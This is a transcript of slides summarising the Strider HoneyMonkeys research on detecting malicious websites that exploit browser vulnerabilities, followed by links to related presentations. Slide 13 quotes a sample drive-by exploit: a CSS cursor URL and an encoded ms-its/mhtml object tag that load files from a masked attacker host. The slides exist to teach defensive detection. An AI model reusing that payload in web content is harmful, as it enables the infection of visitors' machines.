Presentation is loading. Please wait.

Presentation is loading. Please wait.

Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang,

Published bySelina Wheatley Modified over 9 years ago

Similar presentations

Presentation on theme: "Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang,"— Presentation transcript:

1 Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King PUBLISHED IN: MICROSOFT RESEARCH,Redmond

2  EMERGING ATTACK : INTERNET ATTACKS BY MALICIOUS WEBSITE  EXPLOIT BROWSER VULNERABILITIES  INSTALL MALICIOUS CONTENTS  USE OF HONEYMONKEYS FOR SOLUTION PROPOSED PROBLEM

3 BROWSER BASED VULNERABILITY Code Obfuscation URL redirection Vulnerability exploitation Malware installation

4 CODE OBFUSCATION

5 To escape from signature based scanning Custom decoding routine included inside the script Unreadable long strings that are encoded and decoded later by the script or by the browser

6 ENCODED MALICIOUS CODE

7 DECODED MALICIOUS CODE

8 URL REDIRECTION

9 PRIMARY URL TO SECONDARY URL PROTOCOL REDIRECTION USING HTTP 302 TEMPORARY REDIRECT HTML TAGS Script functions including w indow.location.replace().

10 URL REDIRECTION PRIMARY SECONDARY USER http://[IP address] /[8 chars]/test2/iejp.htm http://[IP address]

11 VULNERABILITY EXPLOITATION

12 Malicious Website attempt to exploit multiple vulnerabilities HTML fragment – multiple files from different URL’S Dynamic code injection using Document.write Trojan downloader works after exploits Most attacked browser is IE

13 EXAMPLE FOR VULNERABILITY * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} Try{ document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#1 09&#108&#58&#102&#105&#108&#101:// C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/ta rg'+'et.htm` type=`text/x-scriptlet`> '); }catch(e){} Exploit 1 Exploit 2 Exploit 3

14 Honey Monkey Exploit Detection System Active client side virtual machines called honeypots Large scale, systematic and automated web patrol It mimics human browsing Different patches and different levels of vulnerability

15 HONEYMONKEY SYSTEM Stage 1 – scalable mode by visiting N- URLs. Stage 2 – perform recursive redirected analysis. Stage 3 – scan exploit URLs using fully patched VMs.

16 HONEY MONKEY SYSTEM

17 TOPOLOGY GRAPH AND NODE RANKING Rectangular nodes represent Exploit URL’s Arrows represent traffic redirection Circles represent nodes that act as an aggregation point for exploit pages hosted R is the most likely exploit provider

18 TOPOLOGY GRAPH AND NODE RANKING

19 GENERATING URL LISTS Generating URL LISTS - Suspicious URL’s - Popular websites – if attacked potentially attack larger population - Localized space websites

20 Exploit Detection Report Executable files created or modified outside the browser sandbox folders Processes created Windows registry entry created or modified Vulnerability exploited Redirect URL visited

21 Patch level statistics

22 RESULTS

23

24 ADVANTAGES Automatic Scalable Non-signature based approach Stage-wise detection

25 DISADVANTGES Exploiters may randomize the attack confusing the honey monkeys Exploiters were able to detect honey monkeys by sending dialog box They didn’t explain about topology graphs very clearly

26 IMPROVEMENTS  They need to work on accuracy  They need more classification according to contents  They should improve on avoiding detection by the honey monkeys

Download ppt "Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang,"

Similar presentations

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.

Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.
Fast and Precise In-Browser JavaScript Malware Detection

Fast and Precise In-Browser JavaScript Malware Detection
Lesson 4: Web Browsing.

Lesson 4: Web Browsing.
A Crawler-based Study of Spyware on the Web Author: Alexander Moshchuk, Tanya Bragin, Steven D.Gribble, Henry M.Levy Presented At: NDSS, 2006 Prepared.

A Crawler-based Study of Spyware on the Web Author: Alexander Moshchuk, Tanya Bragin, Steven D.Gribble, Henry M.Levy Presented At: NDSS, 2006 Prepared.
Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities Y.-M. Wang, D. Beck, X. Jiang in Proceedings of.

Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities Y.-M. Wang, D. Beck, X. Jiang in Proceedings of.
Detection of Attacks with Proxy-based Execution Alex Kiaie, Benjamin Prosnitz, Yi Tang, Yinzhi Cao.

Detection of Attacks with Proxy-based Execution Alex Kiaie, Benjamin Prosnitz, Yi Tang, Yinzhi Cao.
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.

Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.
Automated Web Patrol with Strider Honey Monkeys Y.Wang, D.Beck, S.Chen, S.King, X.Jiang, R.Roussev, C.Verbowski Microsoft Research, Redmond Justin Miller.

Automated Web Patrol with Strider Honey Monkeys Y.Wang, D.Beck, S.Chen, S.King, X.Jiang, R.Roussev, C.Verbowski Microsoft Research, Redmond Justin Miller.
Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.

Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.
©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane
Automated Web Patrol with Strider HoneyMonkeys Present by Zhichun Li.

Automated Web Patrol with Strider HoneyMonkeys Present by Zhichun Li.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
Hands-On Microsoft Windows Server 2008 Chapter 8 Managing Windows Server 2008 Network Services.

Hands-On Microsoft Windows Server 2008 Chapter 8 Managing Windows Server 2008 Network Services.
Web Page A page displayed by the browser. Website Collection of multiple web pages Web Browser: A software that displays web pages on client computer.

Web Page A page displayed by the browser. Website Collection of multiple web pages Web Browser: A software that displays web pages on client computer.
Chapter 9 Collecting Data with Forms. A form on a web page consists of form objects such as text boxes or radio buttons into which users type information.

Chapter 9 Collecting Data with Forms. A form on a web page consists of form objects such as text boxes or radio buttons into which users type information.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

Similar presentations

Ads by Google